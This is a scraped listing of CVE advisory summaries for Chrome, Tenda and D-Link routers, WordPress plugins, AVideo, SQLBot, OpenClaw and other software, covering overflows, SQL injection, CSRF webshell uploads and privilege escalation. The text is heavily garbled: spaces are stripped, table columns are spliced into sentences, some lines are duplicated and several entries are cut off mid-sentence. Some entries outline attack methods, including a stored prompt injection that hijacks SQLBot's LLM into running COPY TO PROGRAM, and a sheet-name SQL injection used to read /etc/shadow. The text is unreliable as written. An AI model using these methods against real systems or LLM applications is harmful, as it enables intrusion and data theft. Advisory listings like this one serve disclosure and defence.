committed.claude/settings.json,causingthetrustdialogtobesilentlyskippedonfirstopen.Thisallowedauser 8.8 Details33068 tobeplacedintoapermissivemodewithoutseeingthetrustconfirmationprompt,makingiteasierforan attacker-controlledrepositorytogaintoolexecutionwithoutexplicituserconsent.Thisissuehasbeenpatchedin version2.1.53. AvulnerabilitywasidentifiedinD-LinkDHP-13201.00WWB04.ThisaffectsthefunctionredirectcountdownpageCVE- ofthecomponentSOAPHandler.Suchmanipulationleadstostack-basedbufferoverflow.Theattackcanbe More2026- 8.8 executedremotely.Theexploitispubliclyavailableandmightbeused.Thisvulnerabilityonlyaffectsproducts Details4529 thatarenolongersupportedbythemaintainer. The'TheUltimateWordPressToolkit–WPExtended'pluginforWordPressisvulnerabletoPrivilegeEscalationin allversionsupto,andincluding,3.2.4.ThisisduetotheisDashboardOrProfileRequest()methodintheMenu Editormoduleusinganinsecurestrpos()checkagainst`$SERVER['REQUESTURI']todetermineifarequest CVE- targetsthedashboardorprofilepage.ThegrantVirtualCaps()method,whichishookedintotheuserhascapMore 8.8 filter,grantselevatedcapabilitiesincludingmanageoptions`whenthischeckreturnstrue.Thismakesitpossible Details forauthenticatedattackers,withSubscriber-levelaccessandabove,togainadministrativecapabilitiesby appendingacraftedqueryparametertoanyadminURL,allowingthemtoupdatearbitraryWordPressoptionsand appendingacraftedqueryparametertoanyadminURL,allowingthemtoupdatearbitraryWordPressoptionsand ultimatelycreatenewAdministratoraccounts.

CVE- ImproperRestrictionofOperationswithintheBoundsofaMemoryBuffervulnerabilityinlinkingvision More 8.8 rapidvms.Thisissueaffectsrapidvms:beforePR#96. Details33848 CVE- AflawhasbeenfoundinTendaFH4511.0.0.9.ThisaffectsthefunctionformWrlExtraSetofthefile More2026- /goform/WrlExtraSet.ThismanipulationoftheargumentGOcausesstack-basedbufferoverflow.Theattackcan 8.8 Details4534 beinitiatedremotely.Theexploithasbeenpublishedandmaybeused. CVE- OutofboundsreadinSkiainGoogleChromepriorto146.0.7680.153allowedaremoteattackertoperformanout More2026- 8.8 ofboundsmemoryreadviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4460 CVE- UseafterfreeinFedCMinGoogleChromepriorto146.0.7680.165allowedaremoteattackertoexecutearbitrary More2026- 8.8 codeinsideasandboxviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4680 CVE- AvulnerabilityhasbeenfoundinTendaFH4511.0.0.9.ThisvulnerabilityaffectsthefunctionWrlclientSetofthe More2026- file/goform/WrlclientSet.SuchmanipulationoftheargumentGOleadstostack-basedbufferoverflow.Theattack 8.8 Details4535 canbelaunchedremotely.Theexploithasbeendisclosedtothepublicandmaybeused. CVE- IntegeroverflowinFontsinGoogleChromepriorto146.0.7680.165allowedaremoteattackertoperformanout More2026- 8.8 ofboundsmemorywriteviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4679 CVE- UseafterfreeinWebGPUinGoogleChromepriorto146.0.7680.165allowedaremoteattackertoexecute More2026- 8.8 arbitrarycodeinsideasandboxviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4678 CVE- InappropriateimplementationinWebAudioinGoogleChromepriorto146.0.7680.165allowedaremoteattacker More2026- 8.8 toperformanoutofboundsmemoryreadviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4677

DNAsequencealignmentdata.WhilemostalignmentrecordsstoreDNAsequenceandqualityvalues,theformat alsoallowsthemtoomitthisdataincertaincasestosavespace.DuetosomequirksoftheCRAMformat,itis necessarytohandletheserecordscarefullyastheywillactuallystoredatathatneedstobeconsumedandthenCVE-discarded.Unfortunatelythecram_decode_seq()didnothandlethiscorrectlyinsomecases.Wherethis More2026- 8.8happeneditcouldresultinreadingasinglebytefrombeyondtheendofaheapallocation,followedbywritinga Details31962singleattacker-controlledbytetothesamelocation.Exploitingthisbugcausesaheapbufferoverflow.Ifauser opensafilecraftedtoexploitthisissue,itcouldleadtotheprogramcrashing,oroverwritingofdataandheap structuresinwaysnotexpectedbytheprogram.Itmaybepossibletousethistoobtainarbitrarycodeexecution. Versions1.23.1,1.22.2and1.21.1includefixesforthisissue.Thereisnoworkaroundforthisissue. CVE-ImproperRestrictionofOperationswithintheBoundsofaMemoryBuffervulnerabilityinlinkingvision More2026- 8.8rapidvms.Thisissueaffectsrapidvms:beforePR#96. Details33849 CVE-UseafterfreeinBlinkinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentiallyexploit More2026- 8.8heapcorruptionviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4449 Jenkins2.554andearlier,LTS2.541.2andearlierdoesnotsafelyhandlesymboliclinksduringtheextractionof CVE-.tarand.tar.gzarchives,allowingcraftedarchivestowritefilestoarbitrarylocationsonthefilesystem,restricted More2026-onlybyfilesystemaccesspermissionsoftheuserrunningJenkins.Thiscanbeexploitedtodeploymalicious 8.8 Details33001scriptsorpluginsonthecontrollerbyattackerswithItem/Configurepermission,orabletocontrolagent processes. CVE-InsufficientvalidationofuntrustedinputinNavigationinGoogleChromepriorto146.0.7680.153allowedaremote More2026-attackerwhohadcompromisedtherendererprocesstopotentiallyperformasandboxescapeviaacraftedHTML 8.8 Details4451page.(Chromiumsecurityseverity:High) CVE-IntegeroverflowinANGLEinGoogleChromeonWindowspriorto146.0.7680.153allowedaremoteattackerto More2026- 8.8 Details4452 TheExpireUserspluginforWordPressisvulnerabletoPrivilegeEscalationinallversionsupto,andincluding,CVE-1.2.2.Thisisduetothepluginallowingausertoupdatethe'onexpiredefaulttorole'metathroughthe More2026- 8.8'saveextrauserprofilefields'function.Thismakesitpossibleforauthenticatedattackers,withSubscriber-level Details accessandabove,toelevatetheirprivilegestothatofanadministrator. InJujufromversion3.0.0through3.6.18,theauthorizationofthe"secret-set"toolisnotperformedcorrectly,CVE- whichallowsagranteetoupdatethesecretcontent,andcanleadtoreadingorupdatingothersecrets.Whenthe 8.8 More 32693"secret-set"toollogsanerrorinanexploitationattempt,thesecretisstillupdatedcontrarytoexpectations,and Details 32693 "secret-set"toollogsanerrorinanexploitationattempt,thesecretisstillupdatedcontrarytoexpectations,and Details thenewvalueisvisibletoboththeownerandthegrantee. TheimportformCSRFvulnerabilityinMuraCMSthrough10.1.10allowsattackerstouploadandinstallmalicious formdefinitionsthroughaCSRFattack.ThevulnerablecForm.importformfunctionlacksCSRFtokenvalidation, enablingmaliciouswebsitestoforgefileuploadrequeststhatinstallattacker-controlledformswhenan authenticatedadministratorvisitsacraftedwebpage.FullexploitationofthisvulnerabilitywouldrequiretheCVE-victimtoselectamaliciousZIPfilecontainingformdefinitions,whichcanbeautomaticallygeneratedbythe More2025- 8.8exploitpageandusedtocreatedatacollectionformsthatstealsensitiveinformation.Successfulexploitationof Details55040theimportformCSRFvulnerabilitycouldresultintheinstallationofmaliciousdatacollectionformsonthetarget MuraCMSwebsitethatcanstealsensitiveuserinformation.Whenanauthenticatedadministratorvisitsa maliciouswebpagecontainingtheCSRFexploitandselectstheattacker-generatedZIPfile,theirbrowseruploads andinstallsformdefinitionsthatcreatelegitimateformsthatcouldbedesignedwithmaliciouscontent. TheTrashRestoreCSRFvulnerabilityinMuraCMSthrough10.1.10allowsattackerstorestoredeletedcontent fromthetrashtounauthorizedlocationsthroughCSRF.ThevulnerablecTrash.restorefunctionlacksCSRFtoken validation,enablingmaliciouswebsitestoforgerequeststhatrestorecontenttoarbitraryparentlocationswhen anauthenticatedadministratorvisitsacraftedwebpage.SuccessfulexploitationoftheTrashRestoreCSRF CVE-vulnerabilityresultsinunauthorizedrestorationofdeletedcontenttopotentiallyinappropriateormalicious More2025-locationswithintheMuraCMSwebsitestructure.Whenanauthenticatedadministratorvisitsamaliciouswebpage 8.8 Details55044containingtheCSRFexploit,theirbrowserautomaticallysubmitsahiddenformthatrestoresspecifiedcontent fromthetrashtoalocationdeterminedbytheattackerthroughtheparentidparameter.Thiscanleadto restorationofpreviouslydeletedmaliciouscontent,placementofsensitivedocumentsinpublicareas, manipulationofwebsitenavigationstructure,orrestorationofoutdatedcontentthatwasintentionallyremoved forsecurityorcompliancereasons. CVE-UseafterfreeinNetworkinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentially More2026- 8.8 Details4454 PhreeBooksERP5.2.3containsaremotecodeexecutionvulnerabilityintheimagemanagerthatallowsCVE-authenticatedattackerstouploadandexecutearbitraryPHPfilesbybypassingfileextensioncontrols.Attackers More2019- 8.8canuploadmaliciousPHPfilesthroughtheimagemanagerendpointandexecutethemtoestablishreverseshell Details25647connectionsandexecutesystemcommands. CVE-Out-of-boundsWritevulnerabilityinMolotovCherryAndroid-ImageMagick7.ThisissueaffectsAndroid- More2026- 8.8ImageMagick7:before7.1.2-10. Details33854 ThePhotoGallery,Sliders,ProofingandThemes–NextGENGallerypluginforWordPressisvulnerabletoLocalFile Inclusioninallversionsupto,andincluding,4.0.3viathe'template'parameteringalleryshortcodes.ThismakesCVE-itpossibleforauthenticatedattackers,withAuthor-levelaccessandabove,toincludeandexecutearbitrary.php More2026- 8.8filesontheserver,allowingtheexecutionofanyPHPcodeinthosefiles.Thiscanbeusedtobypassaccess Details1463controls,obtainsensitivedata,orachievecodeexecutionincaseswhere.phpfiletypescanbeuploadedand included. CVE-HeapbufferoverflowinPDFiuminGoogleChromepriorto146.0.7680.153allowedaremoteattackerto More2026- 8.8potentiallyexploitheapcorruptionviaacraftedPDFfile.(Chromiumsecurityseverity:High) Details4455 PhreeBooksERP5.2.3containsanarbitraryfileuploadvulnerabilityintheImageManagercomponentthatallowsCVE-authenticatedattackerstouploadmaliciousfilesbysubmittingrequeststotheimageuploadendpoint.Attackers More2019- 8.8canuploadPHPfilesthroughtheimgFileparametertothebizuno/image/managerendpointandexecutethemvia Details25630thebizunoFS.phpscriptforremotecodeexecution. CVE-Alow-privilegedremoteattackermaybeabletoreplacethebootapplicationoftheCODESYSControlruntime More2025- 8.8system,enablingunauthorizedcodeexecution. Details41660 CVE-UseafterfreeinDigitalCredentialsAPIinGoogleChromepriorto146.0.7680.153allowedaremoteattackerwho More2026-hadcompromisedtherendererprocesstopotentiallyperformasandboxescapeviaacraftedHTMLpage. 8.8 Details4456(Chromiumsecurityseverity:High) FastGPTisanAIAgentbuildingplatform.Inversions4.14.8.3andbelow,thefastgpt-preview-image.ymlworkflow CVE-isvulnerabletoarbitrarycodeexecutionandsecretexfiltrationbyanyexternalcontributor.Ituses More2026-pullrequesttarget(whichrunswithaccesstorepositorysecrets)butchecksoutcodefromthepullrequest 8.8 Details33075author'sfork,thenbuildsandpushesDockerimagesusingattacker-controlledDockerfiles.Thisalsoenablesa supplychainattackviatheproductioncontainerregistry.Apatchwasnotavailableatthetimeofpublication.

Priortoversions7.15.1and8.9.3,theretrieve()functionininclude/OutboundEmail/OutboundEmail.phpfailsto properlyneutralizetheusercontrolled$idparameter.Itisassumedthatthefunctioncallingretrieve()will appropriatelyquoteandsanitizetheuserinput.However,twolocationshavebeenidentifiedthatcanbereachedCVE- MorethroughtheEmailUIAjaxactionontheEmail()modulewherethisisnotthecase.Assuch,itispossibleforan 8.8 authenticatedusertoperformSQLinjectionthroughtheretrieve()function.Thisaffectsthelatestmajor Details29099 versions7.15and8.9.Astheredonotappeartoberestrictionsonwhichtablescanbecalled,itwouldbepossible versions7.15and8.9.Astheredonotappeartoberestrictionsonwhichtablescanbecalled,itwouldbepossible foranattackertoretrievearbitraryinformationfromthedatabase,includinguserinformationandpassword hashes.Versions7.15.1and8.9.3patchtheissue. CVE-UseafterfreeinDawninGoogleChromepriorto146.0.7680.165allowedaremoteattackertopotentiallyperform More 8.8asandboxescapeviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4676 CVE-HeapbufferoverflowinWebGLinGoogleChromepriorto146.0.7680.165allowedaremoteattackertoperform More2026- 8.8anoutofboundsmemoryreadviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details4675 CVE-InappropriateimplementationinV8inGoogleChromepriorto146.0.7680.153allowedaremoteattackerto More2026- 8.8 Details4461 WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,therestreamerendpoint constructsalogfilepathbyembeddinguser-controlledusers_idandliveTransmitionHistory_idvaluesfromtheCVE-JSONrequestbodywithoutanysanitization.Thislogfilepathisthenconcatenateddirectlyintoshellcommands More2026- 8.8passedtoexec(),allowinganauthenticatedusertoachievearbitrarycommandexecutionontheserverviashell Details33648metacharacterssuchas$()orbackticks.Commit99b865413172045fef6a98b5e9bfc7b24da11678containsa patch. BMCFootPrintsITSMversions20.20.02through20.24.01.001containadeserializationofuntrusteddata CVE-vulnerabilityintheASP.NETservlet'sVIEWSTATEhandlingthatallowsauthenticatedattackerstoexecutearbitrary More2025-code.AttackerscansupplycraftedserializedobjectstotheVIEWSTATEparametertoachieveremotecode 8.8 Details71260executionandfullycompromisetheapplication.Thefollowinghotfixesremediatethevulnerability:20.20.02, 20.20.03.002,20.21.01.001,20.21.02.002,20.22.01,20.22.01.001,20.23.01,20.23.01.002,and20.24.01. CVE-DevomeGRRv4.5.0wasdiscoveredtocontainmultipleauthenticatedSQLinjectionvulnerabilitiesinthe More2026- 8.8include/session.inc.phpfileviatherefereranduser-agent. Details30711 AweaknesshasbeenidentifiedinD-LinkDIR-5131.10.Theimpactedelementisthefunction CVE-formEasySetTimezoneofthefile/goform/formEasySetTimezoneofthecomponentboa.Thismanipulationofthe More2026-argumentcurTimecausesstack-basedbufferoverflow.Theattackcanbeinitiatedremotely.Theexploithasbeen 8.8 Details4555madeavailabletothepublicandcouldbeusedforattacks.Thisvulnerabilityonlyaffectsproductsthatareno longersupportedbythemaintainer. BlinkoisanAI-poweredcardnote-takingproject.Priortoversion1.8.4,thereisaprivilegeescalationvulnerability. TheupsertUserendpointhas3issues:itismissingsuperAdminAuthMiddleware,anylogged-inusercancallit;theCVE-originalPasswordisanoptionalparameterandifnotprovidedpasswordverificationisskipped;thereisnocheck More2026- 8.8forinput.id===ctx.id(ownershipverification).Thiscouldresultinanyauthenticatedusermodifyingotherusers' Details23480passwords,directescalationtosuperadmin,andcompleteaccounttakeover.Thisissuehasbeenpatchedin version1.8.4. AflawhasbeenfoundinLinksysMR96002.0.6.206937.AffectedisthefunctionsmartConnectConfigureofthefile CVE-SmartConnect.lua.Executingamanipulationoftheargument More2026-configApSsid/configApPassphrase/srpLogin/srpPasswordcanleadtooscommandinjection.Theattackmaybe 8.8 Details4558launchedremotely.Theexploithasbeenpublishedandmaybeused.Thevendorwascontactedearlyaboutthis

downloadVideoFromDownloadURL()functioninobjects/aVideoEncoder.json.phpsavesremotecontenttoaCVE-web-accessibletemporarydirectoryusingtheoriginalURL'sfilenameandextension(including.php).By More2026- 8.8providinganinvalidresolutionparameter,anattackertriggersanearlydie()viaforbiddenPage()beforethe Details33717tempfilecanbemovedorcleanedup,leavinganexecutablePHPfilepersistentlyaccessibleunderthewebroot atvideos/cache/tmpFile/.Commit6da79b43484099a0b660d1544a63c07b633ed3a2containsapatch. AVideoisavideo-sharingPlatform.Versionspriorto8.0containaSQLInjectionvulnerabilityinthe getSqlFromPost()methodofObject.php.The$POST['sort']arraykeysareuseddirectlyasSQLcolumnidentifiers CVE-insideanORDERBYclause.Althoughrealescapestring()wasapplied,itonlyescapesstring-contextcharacters More2026-(quotes,nullbytes)andprovidesnoprotectionforSQLidentifiers—makingitentirelyineffectivehere.Thisissue 8.8 Details33025hasbeenfixedinversion8.0.Toworkaroundthisissuewithoutupgrading,operatorscanapplyaWAFruleto blockPOSTrequestswhereanysort[*]keycontainscharactersoutside[A-Za-z0-9].Alternatively,restrictaccess tothequeueview(queue.json.php,index.php)totrustedIPrangesonly.

ImageGallery::saveFile()methodvalidatesuploadedfilecontentusingfinfoMIMEtypedetectionbutderivesCVE-thesavedfilenameextensionfromtheuser-suppliedoriginalfilenamewithoutanallowlistcheck.Anattackercan More2026- 8.8uploadapolyglotfile(validJPEGmagicbytesfollowedbyPHPcode)witha.phpextension.TheMIMEcheck Details33647passes,butthefileissavedasanexecutable.phpfileinaweb-accessibledirectory,achievingRemoteCode Execution.Commit345a8d3ece0ad1e1b71a704c1579cbf885d8f3aecontainsapatch. CVE-OutofboundsreadinCSSinGoogleChromepriorto146.0.7680.165allowedaremoteattackertoperformoutof More 8.8 8.8boundsmemoryaccessviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details OpenClawversions2026.2.22priorto2026.2.25containaprivilegeescalationvulnerabilityallowingunpairedCVE-deviceidentitiestobypassoperatorpairingrequirementsandself-assignelevatedoperatorscopesincluding More 8.8operator.admin.Attackerswithvalidsharedgatewayauthenticationcanpresentaself-signedunpaireddevice Details32042identitytorequestandobtainhigheroperatorscopesbeforepairingapprovalisgranted. CVE-AvulnerabilitywasdetectedinTendaAC2116.03.08.16.ImpactedisthefunctionformSetQosBandofthefile More2026-/goform/SetNetControlList.Performingamanipulationoftheargumentlistresultsinbufferoverflow.Theattack 8.8 Details4565canbeinitiatedremotely.Theexploitisnowpublicandmaybeused. AflawhasbeenfoundinBelkinF9K11221.00.33.TheaffectedelementisthefunctionformWISP5GofthefileCVE-/goform/formWISP5G.Executingamanipulationoftheargumentwebpagecanleadtostack-basedbuffer More2026- 8.8overflow.Theattackcanbelaunchedremotely.Theexploithasbeenpublishedandmaybeused.Thevendorwas Details4566

objects/pluginImport.json.phpendpointallowsadminuserstouploadandinstallpluginZIPfilescontainingCVE-executablePHPcode,butlacksanyCSRFprotection.Combinedwiththeapplicationexplicitlysetting More2026- 8.8session.cookie_samesite='None'forHTTPSconnections,anunauthenticatedattackercancraftapagethat, Details33507whenvisitedbyanauthenticatedadmin,silentlyuploadsamaliciousplugincontainingaPHPwebshell,achieving RemoteCodeExecutionontheserver.Commitd1bc1695edd9ad4468a48cea0df6cd943a2635f3containsapatch. AcommandinjectionvulnerabilityexistsinDigitalOceanDropletAgentthrough1.3.2.Thetroubleshooting actionercomponent(internal/troubleshooting/actioner/actioner.go)processesmetadatafromthemetadata serviceendpointandexecutescommandsspecifiedintheTroubleshootingAgent.Requestingarraywithout adequateinputvalidation.WhilethecodevalidatesthatartifactsexistinthevalidInvestigationArtifactsmap,it failstosanitizetheactualcommandcontentafterthe"command:"prefix.ThisallowsanattackerwhocancontrolCVE-metadataresponsestoinjectandexecutearbitraryOScommandswithrootprivileges.Theattackistriggeredby More2026- 8.8sendingaTCPpacketwithspecificsequencenumberstotheSSHport,whichcausestheagenttofetchmetadata Details24516fromhttp://169.254.169.254/metadata/v1.json.Thevulnerabilityaffectsthecommandexecutionflowin internal/troubleshooting/actioner/actioner.go(insufficientvalidation),internal/troubleshooting/command/exec.go (directexec.CommandContextcall),andinternal/troubleshooting/command/command.go(commandparsing withoutsanitization).Thiscanleadtocompletesystemcompromise,dataexfiltration,privilegeescalation,and potentiallateralmovementacrosscloudinfrastructure. WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,theGalleryplugin's saveSort.json.phpendpointpassesunsanitizeduserinputfrom$_REQUEST['sections']arrayvaluesdirectlyCVE-intoPHP'seval()function.WhiletheendpointisgatedbehindUser::isAdmin(),ithasnoCSRFtokenvalidation. More2026- 8.8CombinedwithAVideo'sexplicitSameSite=Nonesessioncookieconfiguration,anattackercanexploitthisvia Details33479cross-siterequestforgerytoachieveunauthenticatedremotecodeexecution—requiringonlythatanadminvisits anattacker-controlledpage.Commit087dab8841f8bdb54be184105ef19b47c5698fcbcontainsapatch. SQLBotisanintelligentdataquerysystembasedonalargelanguagemodelandRAG.Versions1.5.0andbelow containaStoredPromptInjectionvulnerabilitythatchainsthreeflaws:amissingpermissioncheckontheExcel CVE-uploadAPIallowinganyauthenticatedusertouploadmaliciousterminology,unsanitizedstorageofterminology More2026-descriptionscontainingdangerouspayloads,andalackofsemanticfencingwheninjectingterminologyintothe 8.8 Details32622LLM'ssystemprompt.Together,theseflawsallowanattackertohijacktheLLM'sreasoningtogeneratemalicious PostgreSQLcommands(e.g.,COPY...TOPROGRAM),ultimatelyachievingRemoteCodeExecutiononthe databaseorapplicationserverwithpostgresuserprivileges.Theissueisfixedinv1.6.0. OpenClawversionspriorto2026.2.25containasymlinktraversalvulnerabilityintheagents.files.getandCVE-agents.files.setmethodsthatallowsreadingandwritingfilesoutsidetheagentworkspace.Attackerscanexploit More2026- 8.8symlinkedallowlistedfilestoaccessarbitraryhostfileswithingatewayprocesspermissions,potentiallyenabling Details32013codeexecutionthroughfileoverwriteattacks. OpenClawversionspriorto2026.3.1containanauthorizationmismatchvulnerabilitythatallowsauthenticatedCVE-callerswithoperator.writescopetoinvokeowner-onlytoolsurfacesincludinggatewayandcronthroughagent More2026- 8.8runsinscoped-tokendeployments.Attackerswithwrite-scopeaccesscanperformcontrol-planeactionsbeyond Details32051theirintendedauthorizationlevelbyexploitinginconsistentowner-onlygatingduringagentexecution. CVE-DeserializationofUntrustedDatavulnerabilityinMembershipSoftwareWishListMemberXallowsObject More2026- 8.8Injection.ThisissueaffectsWishListMemberX:fromn/athrough3.29.0. Details25445 AvulnerabilitywasidentifiedinTendaF4531.0.0.3.ImpactedisthefunctionfromNatlimitofthefileCVE-/goform/NatlimitofthecomponentParametersHandler.Themanipulationoftheargumentpageleadstostack- More2026- 8.8basedbufferoverflow.Itispossibletoinitiatetheattackremotely.Theexploitispubliclyavailableandmightbe Details4553used. CVE- HeapbufferoverflowinWebAudioinGoogleChromepriorto146.0.7680.165allowedaremoteattackerto More 8.8performanoutofboundsmemorywriteviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details CVE- CVE-OutofboundsreadinBlinkinGoogleChromepriorto146.0.7680.153allowedaremoteattackertoperforman More 8.8outofboundsmemoryreadviaacraftedHTMLpage.(Chromiumsecurityseverity:High) Details CVE-HeapbufferoverflowinWebRTCinGoogleChromepriorto146.0.7680.153allowedaremoteattackerto More 8.8 Details4463 CVE-IntegeroverflowinANGLEinGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentially More2026- 8.8exploitheapcorruptionviaacraftedHTMLpage.(Chromiumsecurityseverity:Medium) Details4464 TheJupiterXCorepluginforWordPressisvulnerabletolimitedfileuploadsduetomissingauthorizationon importpopuptemplates()functionaswellasinsufficientfiletypevalidationintheuploadfiles()functioninallCVE-versionsupto,andincluding,4.14.1.ThismakesitpossibleforAuthenticatedattackerswithSubscriber-level More2026- 8.8accessandabove,touploadfileswithdangeroustypesthatcanleadtoRemoteCodeExecutiononservers Details3533configuredtohandle.pharfilesasexecutablePHP(e.g.,Apache+modphp),orStoredCross-SiteScriptingvia .svg,.dfxp,or.xhtmlfilesuploadonanyserverconfiguration CVE-OutofboundsmemoryaccessinWebGLinGoogleChromeonAndroidpriorto146.0.7680.153allowedaremote More2026- 8.8attackertopotentiallyperformasandboxescapeviaacraftedHTMLpage.(Chromiumsecurityseverity:Critical) Details4439 IndicoisaneventmanagementsystemthatusesFlask-Multipass,amulti-backendauthenticationsystemfor Flask.Inversionspriorto3.3.12,duetovulnerabilitiesinTeXLiveandobscureLaTeXsyntaxthatallowed circumventingIndico'sLaTeXsanitizer,itispossibletousespecially-craftedLaTeXsnippetswhichcanreadlocal CVE-filesorexecutecodewiththeprivilegesoftheuserrunningIndicoontheserver.Notethatifserver-sideLaTeX More2026-renderingisnotinuse(ieXELATEX_PATHwasnotsetinindico.conf),thisvulnerabilitydoesnotapply.Itis 8.8 Details33046recommendedtoupdatetoIndico3.3.12assoonaspossible.Itisalsostronglyrecommendedtoenablethe containerizedLaTeXrenderer(usingpodman),whichisolatesitfromtherestofthesystem.Asaworkaround, removetheXELATEX_PATHsettingfromindico.conf(orcommentitoutorsetittoNone)andrestartthe indico-uwsgiandindico-celeryservicestodisableLaTeXfunctionality. AvulnerabilityhasbeenfoundinYiTechnologyYIHomeCamera22.1.120171024151200.TheaffectedelementCVE-isanunknownfunctionofthefilehome/web/ipc.Suchmanipulationleadstohard-codedcredentials.Accesstothe More2026- 8.8localnetworkisrequiredforthisattacktosucceed.Theexploithasbeendisclosedtothepublicandmaybeused. Details4475Thevendorwascontactedearlyaboutthisdisclosurebutdidnotrespondinanyway. CVE- More2026-versionsonthe2.xseriesuptoandincluding2.41.0,anauthenticatedusermaybeabletoexecutearbitrarycode 8.8 Details32276intheCodeStudyPlugin.Versions1.41.1and2.41.1containapatch. OpenSourcePointofSaleisawebbasedpoint-of-saleapplicationwritteninPHPusingCodeIgniterframework. CVE-VersionscontainanSQLInjectionintheItemssearchfunctionality.Whenthecustomattributesearchfeatureis More2026-enabled(searchcustomfilter),user-suppliedinputfromthesearchGETparameterisinterpolateddirectlyintoa 8.8 Details32888HAVINGclausewithoutparameterizationorsanitization.Thisallowsanauthenticatedattackerwithbasicitem searchpermissionstoexecutearbitrarySQLqueries.Apatchdidnotexistatthetimeofpublication. CVE-CensusCSWeb8.0.1allowsarbitraryfileupload.Aremote,authenticatedattackercoulduploadamaliciousfile, More2025- 8.8possiblyleadingtoremotecodeexecution.Fixedin8.1.0alpha. Details60947 LangflowisatoolforbuildinganddeployingAI-poweredagentsandworkflows.Inversionspriorto1.9.0,theCVE-deleteapikeyroute()endpointacceptsanapikeyidpathparameteranddeletesitwithonlyageneric More2026- 8.8authenticationcheck(getcurrentactiveuserdependency).However,thedeleteapikey()CRUDfunctiondoes Details33053NOTverifythattheAPIkeybelongstothecurrentuserbeforedeletion. AvulnerabilitywasfoundinTendaF4531.0.0.3.ThisvulnerabilityaffectsthefunctionfromSafeClientFilteroftheCVE-file/goform/SafeClientFilterofthecomponentParametersHandler.Performingamanipulationoftheargument More2026- 8.8menufacturer/Goresultsinstack-basedbufferoverflow.Theattackispossibletobecarriedoutremotely.The Details4551exploithasbeenmadepublicandcouldbeused. CVE-CensusCSWeb8.0.1allowsarbitraryfilepathinput.Aremote,authenticatedattackercouldaccessunintendedfile More2025- 8.8directories.Fixedin8.1.0alpha. Details60946 AvulnerabilitywasdeterminedinTendaF4531.0.0.3.ThisissueaffectsthefunctionfromVirtualSerofthefileCVE-/goform/VirtualSerofthecomponentParametersHandler.Executingamanipulationoftheargumentpagecan More2026- 8.8leadtostack-basedbufferoverflow.Theattackmaybeperformedfromremote.Theexploithasbeenpublicly Details4552disclosedandmaybeutilized. CVE- OutofboundswriteinV8inGoogleChromepriorto146.0.7680.153allowedaremoteattackertopotentially More 8.8 Details MicrosoftDynamics365CustomerEngagement(on-premises)1612(9.0.2.3034)allowsthegenerationof MicrosoftDynamics365CustomerEngagement(on-premises)1612(9.0.2.3034)allowsthegenerationof customizedreportsviarawSQLqueriesinanuploadofa.rdl(ReportDefinitionLanguage)file;thisisthen processedbytheSQLServerReportingService.AnaccountwiththeprivilegeAddReportingServicesReportscanCVE-uploadamaliciousrdlfile.Ifthemaliciousrdlfileisalreadyloadedanditisexecutablebytheuser,theAdd More 8.8ReportingServicesReportsprivilegeisnotrequired.Amaliciousactorcantriggerthegenerationofthereport, Details58112causingtheexecutionofarbitrarySQLcommandsintheunderlyingdatabase.Dependingonthepermissionsof theaccountrunningSQLServerReportingServices,theattackermaybeabletoperformadditionalactions,such asaccessinglinkedserversorexecutingoperatingsystemcommands. SQLBotisanintelligentdataquerysystembasedonalargelanguagemodelandRAG.Versionspriorto1.7.0 containacriticalSQLInjectionvulnerabilityinthe/api/v1/datasource/uploadExcelendpointthatenablesRemote CodeExecution(RCE),allowinganyauthenticateduser(eventhelowest-privileged)tofullycompromisethe backendserver.Therootcauseistwofold:ExcelSheetnamesareconcatenateddirectlyintoPostgreSQLtable CVE-nameswithoutsanitization(datasource.py#L351),andthosetablenamesareembeddedintoCOPYSQL More2026-statementsviaf-stringsinsteadofparameterizedqueries(datasource.py#L385-L388).Anattackercanbypassthe 8.8 Details3295031-characterSheetnamelimitusingatwo-stagetechnique—firstuploadinganormalfilewhosedatarowscontain shellcommands,thenuploadinganXML-tamperedfilewhoseSheetnameinjectsaTOPROGRAM'sh'clauseinto theSQL.Confirmedimpactsincludearbitrarycommandexecutionasthepostgresuser(uid=999),sensitivefile exfiltration(e.g.,/etc/passwd,/etc/shadow),andcompletePostgreSQLdatabasetakeover.Thisissuehasbeen fixedinversion1.7.0. TheCMSCommanderpluginforWordPressisvulnerabletoSQLInjectionviathe'orblogname', 'orblogdescription',and'oradminemail'parametersinallversionsupto,andincluding,2.288.ThisisduetoCVE-insufficientescapingontheusersuppliedparametersandlackofsufficientpreparationontheexistingSQL More2026- 8.8queriesintherestoreworkflow.Thismakesitpossibleforauthenticatedattackers,withCMSCommanderAPIkey Details3334access,toappendadditionalSQLqueriesintoalreadyexistingqueriesthatcanbeusedtoextractsensitive informationfromthedatabase. AvulnerabilitywasfoundinD-LinkDIR-5131.10.ThisaffectsthefunctionformEasySetPasswordofthefileCVE-/goform/formEasySetPasswordofthecomponentWebService.ThemanipulationoftheargumentcurTimeresults More2026- 8.8instack-basedbufferoverflow.Theattackmaybeperformedfromremote.Theexploithasbeenmadepublicand Details4486couldbeused.Thisvulnerabilityonlyaffectsproductsthatarenolongersupportedbythemaintainer. CVE-AvulnerabilitywasdetectedinTendaA18Pro02.03.02.28.Thisvulnerabilityaffectsthefunction More2026-formfastsettingwifisetofthefile/goform/fastsettingwifiset.Themanipulationresultsinstack-basedbuffer 8.8 Details4489overflow.Theattackmaybelaunchedremotely.Theexploitisnowpublicandmaybeused. CVE-AflawhasbeenfoundinTendaA18Pro02.03.02.28.ThisissueaffectsthefunctionsetSchedWifiofthefile More2026-/goform/openSchedWifi.Thismanipulationcausesstack-basedbufferoverflow.Remoteexploitationoftheattack 8.8 Details4490ispossible.Theexploithasbeenpublishedandmaybeused. CVE-AvulnerabilityhasbeenfoundinTendaA18Pro02.03.02.28.ImpactedisthefunctionfromSetIpMacBindofthe 